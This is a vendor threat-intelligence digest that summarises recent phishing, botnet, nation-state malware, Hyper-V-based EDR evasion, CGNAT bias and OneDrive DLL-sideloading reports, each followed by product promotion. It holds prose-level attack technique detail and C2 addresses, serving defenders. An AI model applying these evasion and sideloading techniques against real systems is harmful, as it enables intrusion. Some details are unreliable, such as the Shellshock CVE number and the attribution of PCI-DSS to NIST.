DigiCert’s Open-Source Intelligence (OSINT) Report – October 31 – November 6, 2025

New Phishing Campaign Abuses Cloudflare Pages and ZenDesk to Harvest Credentials

(TLP: CLEAR) Security researchers have uncovered a large-scale phishing campaign exploiting trusted cloud hosting infrastructure to conduct credential theft operations against enterprise and consumer targets. The campaign leverages Cloudflare Pages and ZenDesk platforms to create convincing fraudulent customer support portals, with analysts identifying over 600 malicious domains registered under the *.pages[.]dev domain structure. According to researchers, threat actors employ typosquatting techniques to mimic legitimate brand support sites, creating domains that closely resemble authentic services in order to trick victims into lowering their defenses. Furthermore, the phishing operation utilizes artificial intelligence (AI) to generate convincing fraudulent web pages that incorporate embedded live chat interfaces. These chat systems are staffed by malicious human operators who engage directly with victims, maintaining the deception by requesting phone numbers and email addresses under the pretense of providing technical support. Once sufficient personal information is collected, the operators instruct victims to install Rescue, a legitimate remote monitoring and management tool that becomes a dangerous vector when deployed on compromised systems. Installation of this software grants the attackers complete remote access to the victim’s device, enabling systematic harvesting of sensitive data and account credentials. The threat actors further expand their attack surface by abusing Google Site Verification and Microsoft Bing Webmaster tokens for single sign-on poisoning. The campaign’s primary motivation appears to be financially driven account takeover and fraud operations, positioning this as a significant threat to both enterprise organizations and individual users.

(TLP: CLEAR) Comments: This phishing campaign demonstrates a concerning evolution in social engineering tactics where adversaries weaponize the trust placed in legitimate cloud infrastructure providers. The use of Cloudflare and ZenDesk Pages provides attackers with free, reliable hosting that carries the implicit trust of a major CDN provider, while the incorporation of live human operators adds a layer of sophistication that automated detection systems struggle to identify. The decision to abuse legitimate remote access tools like Rescue rather than deploying traditional malware allows the operation to bypass many endpoint detection systems, as the software itself is benign until misused. The scale of the operation, with over 600 malicious domains identified, suggests either a well-resourced criminal organization or a malware-as-a-service operation providing phishing infrastructure to multiple threat actors. The incorporation of AI-generated content to create convincing fake support pages represents a worrying trend where artificial intelligence lowers the technical barrier for conducting sophisticated social engineering attacks, potentially enabling less skilled threat actors to launch credible campaigns that would previously have required significant manual effort and linguistic expertise. 

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following: 

• Phishing: Sites known to host applications that maliciously collect personal or organizational information, including credential harvesting scams. These domains may include typo-squats – or close lookalikes of common domains. PDNS can protect users from accidentally connecting to a potentially malicious link. 

• Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts. 

• Domain generation algorithms: Sites with programmatically generated domain names that are used by malware to circumvent static blocking. Advanced malware – including some botnets – depend on the ability to communicate with command and control (C2) infrastructure. Cyber threat actors use domain generation algorithms (DGAs) for malware to circumvent static blocking – either by domain name or IP – through programmatically generating domain names according to a pre-set seed. PDNS can offer protection from malware DGAs by analyzing every domain’s textual attribute and tagging those associated with known DGA attributes, such as high entropy.

• Content filtering: Sites whose content is in certain categories that are against an organization’s access policies. Although an ancillary benefit to malware protection, PDNS can use a categorization of various domains’ use cases (e.g., ‘gambling’) and warn or block on those that are deemed a risk for a given environment.

 (TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), receives DNS queries from enterprise users and other on-LAN devices, inspects the DNS response for indicators of malicious activity such as phishing, ransomware, and acceptable usage policy violations.

Source: https://cybersecuritynews.com/phishing-attack-that-abuses-cloudflare/

The RondoDox Botnet Version 2 Expands Exploitation Arsenal by 650 %

(TLP: CLEAR) Recent intelligence reporting indicates the RondoDox botnet has undergone a significant evolution, expanding from a limited two-exploit DVR-targeting malware into a sophisticated threat with over 75 distinct exploitation vectors capable of compromising both legacy internet-of-things (IoT) devices and modern enterprise software applications. Originally documented by FortiGuard Labs in September 2024, the newly discovered RondoDox v2 variant was detected on October 30, 2025, through honeypot telemetry when its infrastructure began receiving automated exploitation attempts from IP address 124.198.131.83 originating from New Zealand. According to security researchers, the malware’s sophisticated attack pattern was highly volumetric, deploying 75 distinct exploit payloads in rapid succession, each attempting command injection vectors targeting router and IoT vulnerabilities. All payloads downloaded malicious scripts from the command-and-control server located at 74.194.191.52. Notably, the threat actor embedded an open attribution signature directly into User-Agent strings, marking a departure from the anonymous operational security typically employed by botnet operators. Security researchers at Beelzebub identified the malware through their AI-native deception platform, which captured the complete attack chain and enabled comprehensive technical analysis of the botnet’s capabilities. RondoDox v2 targets an extensive range of vulnerable devices spanning multiple vendor ecosystems and over a decade of CVE history. The exploitation arsenal includes critical vulnerabilities such as CVE-2014-6071 (Shellshock), CVE-2018-10561 affecting Dasan GPON routers, CVE-2021-41773 targeting Apache HTTP Server, and CVE-2024-3721 exploiting TBK DVR systems. The command-and-control (c2) infrastructure operates on compromised residential IP addresses distributed across multiple autonomous system numbers, providing resilience and evasion capabilities that make traditional blocking strategies less effective. The dropper script showcases sophisticated evasion and persistence techniques, immediately disabling SELinux and AppArmor security frameworks upon execution. The script then performs aggressive competitor elimination, systematically killing processes associated with cryptocurrency miners like xmrig and other known botnet families, ensuring resource monopolization while reducing detection probability. As for the botnet’s distributed-denial-of-service (DDoS) capabilities, they include HTTP flood attacks that mimic gaming traffic, UDP UDP floods, TCP SYN floods, and protocol mimicry for OpenVPN, WireGuard, and popular gaming platforms including Minecraft, Fortnite, and Discord.

(TLP: CLEAR) Comments: The dramatic evolution of RondoDox from a narrowly focused DVR botnet to a comprehensive exploitation platform represents a significant escalation in the IoT threat landscape. The 650 percent increase in exploitation capabilities demonstrates a strategic shift where botnet operators are moving beyond opportunistic device compromise toward building versatile platforms capable of targeting both legacy infrastructure and modern enterprise systems within a single campaign. The inclusion of enterprise-focused vulnerabilities like Apache HTTP Server exploits alongside traditional IoT targets suggests the threat actors may be positioning RondoDox for more lucrative operations such as ransomware deployment or corporate espionage rather than limiting themselves to DDoS-for-hire services. The open attribution signature embedded in User-Agent strings represents an unusual operational security decision that could indicate either a remarkably confident threat actor or an intentional false flag operation designed to mislead attribution efforts. The comprehensive architecture support, spanning everything from modern x86_64 systems to legacy SPARC processors, demonstrates an understanding that critical infrastructure and industrial control systems often rely on outdated hardware that remains vulnerable to decade-old exploits. The use of compromised residential IP addresses for command-and-control infrastructure rather than traditional VPS or bulletproof hosting providers indicates sophisticated understanding of detection evasion, as residential IPs are far less likely to appear on threat intelligence blocklists and can blend seamlessly with legitimate traffic patterns.

(TLP: CLEAR) Recommended best practices/regulations: NIST PCI-DSS V4.0 Section 6.4.1: “For public-facing web applications, new threats and vulnerabilities are addressed on an ongoing basis and these applications are protected against known attacks as follows:

“Reviewing public-facing web applications via manual or automated application vulnerability security assessment tools or methods as follows:

• By an entity that specializes in application security. – Including, at a minimum, all common software attacks in Requirement 6.2.4.

• All vulnerabilities are ranked in accordance with requirement 6.3.1.

• All vulnerabilities are corrected.

• The application is re-evaluated after the corrections

OR

• Installing an automated technical solution(s) that continually detects and prevents web-based attacks as follows:

• Installed in front of public-facing web applications to detect and prevent web-based attacks. – Actively running and up to date as applicable.

• Generating audit logs.

• Configured to either block web-based attacks or generate an alert that is immediately investigated.”

(TLP: CLEAR) DigiCert: Digicert’s Web Application Firewall, UltraWAF, equips your company with adaptable security features to counteract the most significant network and application-layer threats, including SQL injection, XSS, and DDoS attacks. It’s always-on security posture, combined with cloud-based scalability, ensures comprehensive protection against the OWASP top 10, advanced bot management, and vulnerability scanning, allowing you to effectively shield your critical and customer-facing applications from emerging threats.

Digicert’s Digicert UltraDDoS Protect is overseen by a 24/7 Security Operations Center (SOC) staffed by senior-level DDoS mitigation professionals who have the expertise, skills, and tools to thwart even the most sophisticated DDoS attacks.

Source: https://cybersecuritynews.com/rondodox-botnet-updated-their-arsenal/

Nation-State Threat Actor Deploys Airstalk Malware in Suspected Supply Chain Attack

(TLP: CLEAR) Security researchers from Palo Alto Networks Unit 42 have identified a sophisticated nation-state threat actor distributing a new malware family dubbed, “Airstalk”, through what appears to be a supply chain attack targeting the business process outsourcing (BPO) sector. According to researchers, the threat actor, tracked as, “CL-STA-1009”, has developed malware that weaponizes the AirWatch mobile device management API, now marketed as Workspace ONE Unified Endpoint Management. The malware exists in both PowerShell and .NET variants, implementing a multi-threaded command-and-control (c2) tunnel that allows attackers to capture screenshots, harvest cookies, browser history, bookmarks, and user credentials from web browsers. Researchers indicated threat actors are leveraging stolen certificates to sign some of the malicious artifacts, with the .NET variant demonstrating significantly more advanced capabilities than its PowerShell counterpart.

Furthermore, the PowerShell variant utilizes the “/api/mdm/devices/” endpoint for command-and-control communications, exploiting the custom attributes feature in the API as a dead drop resolver for storing information necessary for interacting with the attacker infrastructure. Upon execution, the backdoor initializes contact by transmitting a “CONNECT” message and awaiting a “CONNECTED” server response, subsequently receiving various tasks in the form of “ACTIONS” messages with execution results returned via “RESULT” messages. The PowerShell version supports seven distinct actions including screenshot capture, Chrome cookie extraction, Chrome profile enumeration, bookmark collection, browser history harvesting, file system enumeration within user directories, and self-removal capabilities. For large data exfiltration operations, the malware leverages the blobs feature of the AirWatch MDM API to upload content as new blob objects. The .NET variant significantly expands operational capabilities by targeting Microsoft Edge and Island enterprise browser in addition to Chrome, while attempting to masquerade as an AirWatch Helper utility. This version implements three additional message types including MISMATCH for version errors, DEBUG for diagnostic messages, and PING for beaconing functionality. The malware employs three separate execution threads for managing command-and-control tasks, exfiltrating debug logs, and maintaining beacon communications with the control server. Enhanced commands include UpdateChrome, FileMap, a non-implemented RunUtility function, EnterpriseChromeProfiles, UploadFile, OpenURL, Uninstall, EnterpriseChromeBookmarks, EnterpriseIslandProfiles, UpdateIsland, and ExfilAlreadyOpenChrome. While the PowerShell variant implements scheduled task persistence, the .NET version lacks this mechanism. Some .NET samples are signed with a certificate issued to Aoteng Industrial Automation (Langfang) Co., Ltd., which researchers assess as likely stolen, with early compilation timestamps dating back to June 28, 2024.

(TLP: CLEAR) Comments: The Airstalk campaign represents a sophisticated nation-state operation that demonstrates advanced understanding of mobile device management infrastructure and the business process outsourcing ecosystem. The decision to weaponize legitimate MDM APIs rather than developing traditional command-and-control infrastructure provides significant operational security advantages, as traffic between enrolled devices and MDM servers is expected and often encrypted, making detection substantially more difficult for network security monitoring systems. The targeting of enterprise browsers like Island, which is specifically designed for secure access to business applications, strongly suggests the threat actors are pursuing high-value targets within the BPO sector where access to client credentials and session tokens could enable lateral movement into numerous downstream organizations. Furthermore, a single compromise within a BPO provider could grant attackers access to dozens or hundreds of client organizations that rely on these outsourced services. Additionally, the use of a stolen code-signing certificate from a Chinese industrial automation company indicates either direct compromise of that organization or access to black market certificate trading operations, both of which suggest substantial resources and planning. The evolutionary development from PowerShell to .NET variants, with the latter showing significantly expanded capabilities, indicates an active development cycle where the threat actors are iterating on their toolset based on operational requirements and defensive responses. 

(TLP: CLEAR) Recommended best practices/regulations: Request For Comment 9424 “Indicators of Compromise (IoCs) and Their Role in Attack Defence” Section 3.4.2: “Deployment: IoCs can be particularly effective at mitigating malicious activity when deployed in security controls with the broadest impact. This could be achieved by developers of security products or firewalls adding support for the distribution and consumption of IoCs directly to their products, without each user having to do it, thus addressing the threat for the whole user base at once in a machine-scalable and automated manner. This could also be achieved within an enterprise by ensuring those control points with the widest aperture (for example, enterprise-wide DNS resolvers) are able to act automatically based on IoC feeds.” Protective DNS solutions incorporate a wide variety of IoC feeds to detect and block malware and other abuse at the network level for many users.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.

Source: https://thehackernews.com/2025/10/nation-state-hackers-deploy-new.html

Curly COMrades Weaponizes Windows Hyper-V to Conceal Linux Virtual Machine for EDR Evasion

(TLP: CLEAR) Recent intelligence reporting has highlighted the threat actor tracked as, “Curly COMrades”, exploiting Windows virtualization technologies to bypass endpoint detection and response (EDR) solutions while maintaining persistent access in targeted systems. According to recent investigations from Bitdefender in collaboration with Georgia CERT, the threat actor has been observed enabling the Hyper-V role on targeted victim systems in order to deploy a minimalistic Alpine Linux-based virtual machine that hosts custom malware components. This hidden virtualized environment, consuming only 120MB of disk space and 256MB of memory, is what hosted the threat actor’s custom reverse shell designated CurlyShell and a reverse proxy tool called CurlCat. Curly COMrades was first documented by Bitdefender in August 2025 during analysis of attacks targeting Georgia and Moldova, with the activity cluster assessed as active since late 2023 and operating with interests aligned with Russian strategic objectives. Previous campaigns deployed multiple tools including CurlCat for bidirectional data transfer, RuRat for persistent remote access, Mimikatz for credential harvesting, and a modular .NET implant dubbed MucorAgent with development history extending back to November 2023. The follow-up analysis identified additional tooling associated with the threat actor alongside attempts to establish long-term access by weaponizing Hyper-V on compromised Windows 10 hosts to create a hidden remote operating environment. By isolating malware and its execution environment within a virtual machine, the attackers effectively bypassed many traditional host-based endpoint detection and response solutions, as the malicious activity occurs within the guest operating system rather than the monitored Windows host. The threat actor demonstrated persistent determination to maintain reverse proxy capabilities, repeatedly introducing new tooling into compromised environments. Beyond using established tools like Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel, and SSH-based methods for proxy and tunneling operations, Curly COMrades also employed various custom tools including a PowerShell script designed for remote command execution and CurlyShell, a previously undocumented ELF binary deployed within the virtual machine environment to provide persistent reverse shell access. Written in C++, CurlyShell executes as a headless background daemon to establish connections with command-and-control infrastructure and launch reverse shells, enabling threat actors to execute encrypted commands on compromised systems. 

(TLP: CLEAR) Comments: The Curly COMrades campaign represents a significant evolution in threat actor evasion techniques, demonstrating how threat actors are weaponizing legitimate enterprise infrastructure components to create detection-resistant operational environments. The decision to deploy a minimalistic Alpine Linux virtual machine within Windows Hyper-V environments creates a complete isolation environment between the malicious activity and the host-based security components that most endpoint detection solutions rely upon. Traditional EDR products monitor system calls, process creation, network connections, and file operations on the host operating system, but virtualization creates a hardware abstraction layer that prevents these monitoring capabilities from observing activity within the guest operating system. The extremely small footprint of 120MB disk and 256MB memory demonstrates careful operational planning to minimize the forensic artifacts and performance impact that might alert administrators to the presence of unauthorized virtual machines. The aforementioned campaign should serve as a critical warning that virtualization technologies, while essential for modern enterprise infrastructure, create significant blind spots for traditional endpoint security solutions and require specialized monitoring approaches that can instrument hypervisor-level activity or employ network-based detection methods that observe malicious behavior regardless of the execution environment.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds. 

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports 4 distinct detection engines to provide Defense in Depth against malware and phishing and other abuses: 

• The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars. 

• The Categories Engine uses Digicert-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one button click. 

• The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature. 

• The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR. 

Source: https://thehackernews.com/2025/11/hackers-weaponize-windows-hyper-v-to.html

ISPs More Likely to Throttle Netizens Who Connect Through Carrier-Grade NAT

(TLP: CLEAR) A recent study was published at the end of October 2025 revealed how the Carrier-Grade Network Address Translation (CGNAT) infrastructure creates unintended systemic bias in internet security operations, ultimately impacting users in various regions. The research addresses how historical IPv4 address allocation patterns have created persistent inequities that manifest in modern network operations. When IPv4 address exhaustion became apparent, engineers developed Network Address Translation to enable multiple devices to share single IPv4 addresses, with standard NAT implementations supporting tens of thousands of devices. However, internet service providers typically operate at scales requiring Carrier-Grade NAT implementations that can handle over one hundred devices per IPv4 address while scaling to serve millions of users. This technology proves valuable for carriers in countries that missed early IPv4 allocations, with Cloudflare’s research indicating that carriers in Africa and Asia employ CGNAT more extensively than those on other continents due to their smaller pools of available IPv4 resources. The researchers identified significant operational fallout stemming from the architectural characteristic that hundreds or thousands of clients can appear to originate from a single IP address when utilizing CGNAT infrastructure. This creates situations where IP-based security systems may inadvertently block or throttle large groups of users as a result of a single user behind the CGNAT infrastructure engaging in malicious activity, effectively penalizing numerous innocent users alongside the actual abuser. Traditional abuse-mitigation techniques including blocklisting and rate-limiting assume a one-to-one relationship between IP addresses and users, where malicious activity detection triggers blocking of the offending IP address to prevent further abuse. Because CGNAT deployment is more prominent and heavily utilized in Africa and Asia, the researchers posit that CGNAT serves as an unseen source of bias on the internet, with these biases becoming more pronounced wherever there are numerous users but few addresses available, such as in developing regions. To validate this hypothesis, the researchers employed traceroute, WHOIS, reverse DNS pointer records, and existing lists of VPN and proxy IP addresses to identify CGNAT implementations, yielding a dataset of labeled IPs including more than 200,000 CGNAT addresses, 180,000 VPN and proxy addresses, and close to 900,000 other relevant IPs. Analysis of this dataset combined with Cloudflare’s bot activity data revealed indicators of bias, where non-CGNAT IPs demonstrate higher likelihood of being bots than CGNAT IPs, yet internet service providers are more likely to throttle traffic from CGNAT infrastructure. Specifically, despite bot scores indicating traffic is more likely originating from human users, CGNAT IPs are subject to rate limiting three times more frequently than non-CGNAT IPs, likely because multiple users sharing the same public IP address increases the probability that legitimate traffic gets caught by customers’ bot mitigation and firewall rules.

(TLP: CLEAR) Comments: The following investigation highlights critical consequence of IPv4 address exhaustion where technical solutions to address scarcity create systematic disadvantages for users in developing regions who already face numerous digital divide challenges. The three-fold increase in rate-limiting applied to CGNAT traffic compared to direct IP connections represents a significant degradation in service quality that disproportionately affects users in Africa and Asia, effectively creating a multi-tiered internet where users’ experience and access are determined by the historical accident of whether their country secured adequate IPv4 allocations decades ago. This condition exemplifies how technical debt and deferred migrations create compounding issues, as CGNAT was designed as a temporary bridging technology to maintain IPv4 operation until the world transitioned to IPv6, but the notorious difficulty of that transition has resulted in CGNAT becoming a permanent feature of internet infrastructure in many regions. The security implications extend beyond mere rate-limiting inconvenience, as the aggregation of numerous users behind single IP addresses fundamentally breaks the assumption underlying most IP-based security controls that there exists a meaningful correlation between IP addresses and individual actors. This creates a perverse situation where security teams attempting to block malicious activity inevitably create collateral damage affecting potentially thousands of innocent users who happen to share network infrastructure with an attacker. Organizations implementing security controls should recognize that IP-based blocking and rate-limiting strategies, while convenient and efficient, create potential systematic bias against users in regions that rely heavily on CGNAT infrastructure.

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SC-22: “ARCHITECTURE AND PROVISIONING FOR NAME/ADDRESS RESOLUTION SERVICE”: Control: 

• Ensure the systems that collectively provide name/address resolution service for an organization are fault-tolerant and implement internal and external role separation. 

• Discussion: Systems that provide name and address resolution services include domain name system (DNS) servers. To eliminate single points of failure in systems and enhance redundancy, organizations employ at least two authoritative domain name system servers—one configured as the primary server and the other configured as the secondary server. Additionally, organizations typically deploy the servers in two geographically separated network subnetworks (i.e., not located in the same physical facility). For role separation, DNS servers with internal roles only process name and address resolution requests from within organizations (i.e., from internal clients). DNS servers with external roles only process name and address resolution information requests from clients external to organizations (i.e., on external networks, including the Internet). Organizations specify clients that can access authoritative DNS servers in certain roles (e.g., by address ranges and explicit lists).” 

(TLP: CLEAR) DigiCert: Digicert’s UltraDNS solutions include 2 separate and diverse authoritative resolution platforms for an aggregate 47 deployment nodes. UltraDNS provides resiliency, performance and advanced features such as load-balancing, monitored failover, automated DNSSEC signing and geographic resolution.

Source: https://www.theregister.com/2025/11/03/cloudflare_cgnat_bias_research/

Threat Actors Exploit OneDrive Through Advanced DLL Technique

(TLP: CLEAR) Security researchers at Kas-sec have documented a sophisticated cyber-attack technique that exploits Microsoft’s OneDrive application through Dynamic Link Libraries (DLL) sideloading, enabling threat actors to execute malicious code while evading detection mechanisms. The attack leverages a weaponized version.dll file to hijack legitimate Windows processes and while maintaining persistence on compromised systems. According to reporting, DLL sideloading exploits the Windows library-loading mechanism by deceiving legitimate applications into loading malicious DLL instead of authentic system libraries. According to the security advisory, attackers place a crafted version.dll file in the same directory as OneDrive.exe, taking advantage of the application’s dependency search order where applications preferentially load libraries from their local directory before searching system directories. When OneDrive.exe launches, it automatically loads the malicious DLL from its local directory prior to checking system paths. The technique specifically targets version.dll because many Windows applications, including OneDrive, rely on this library to retrieve file version information. By positioning the malicious DLL strategically, attackers can execute code within the trusted context of a digitally signed Microsoft application, effectively bypassing security controls that monitor suspicious process creation or execution. To maintain operational stealth and prevent application crashes that might alert users or security software, attackers implement DLL proxying techniques where the malicious version.dll exports the same functions as the legitimate library, forwarding legitimate function calls to the original Windows System32 version.dll while executing malicious operations in the background. This dual functionality ensures OneDrive.exe continues operating normally, reducing the likelihood of detection by users or security software. The attack employs an advanced hooking technique that leverages Vectored Exception Handling and the PAGE_GUARD memory protection flag. Instead of traditional inline hooking methods that security tools readily detect, this approach intentionally triggers memory exceptions to intercept API calls. When OneDrive.exe attempts to call specific functions like CreateWindowExW, the malicious code captures the execution flow through exception handlers and redirects it to attacker-controlled functions. This method proves particularly effective because it avoids persistent code modifications that signature-based detection systems typically identify. The hook re-arms itself after each interception using single-step exceptions, maintaining continuous control over targeted API functions without leaving persistent forensic artifacts. Once loaded, the malicious DLL spawns a separate thread to execute arbitrary payloads without blocking the application’s initialization process. The proof-of-concept implementation launches additional processes while hiding their windows from view, enabling covert operations on compromised systems. Security professionals are advised to implement application whitelisting, monitor DLL loading behaviors, and validate digital signatures of loaded libraries to defend against these sophisticated sideloading attacks targeting trusted applications.

(TLP: CLEAR) Comments: This DLL sideloading attack against OneDrive demonstrates the persistent vulnerability of the Windows dynamic library loading mechanism, which continues to provide attackers with reliable execution vectors despite decades of awareness within the security community. The technique is particularly insidious because it weaponizes a legitimate, digitally signed Microsoft application to provide the initial trusted execution context, effectively turning the operating system’s code-signing protections against themselves. Most security solutions implement trust-based detection models where digitally signed binaries from trusted publishers like Microsoft receive reduced scrutiny, creating a blind spot that DLL sideloading attacks specifically exploit. The use of version.dll is strategically chosen because this library is ubiquitous across Windows applications yet small enough that its absence or substitution rarely causes immediate functional problems, giving attackers time to establish persistence before any anomalies become apparent. Organizations should implement comprehensive application control policies that validate all DLL loads against known-good cryptographic hashes rather than relying solely on process-level code signing validation, though the performance implications of such validation make practical implementation challenging at scale.

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION

Control:

• Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.

• Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.

• Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection. 

• Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system. 

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client. 

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them.

Source: https://cybersecuritynews.com/onedrive-exe-dll-sideloading-with-malicious-dll-files/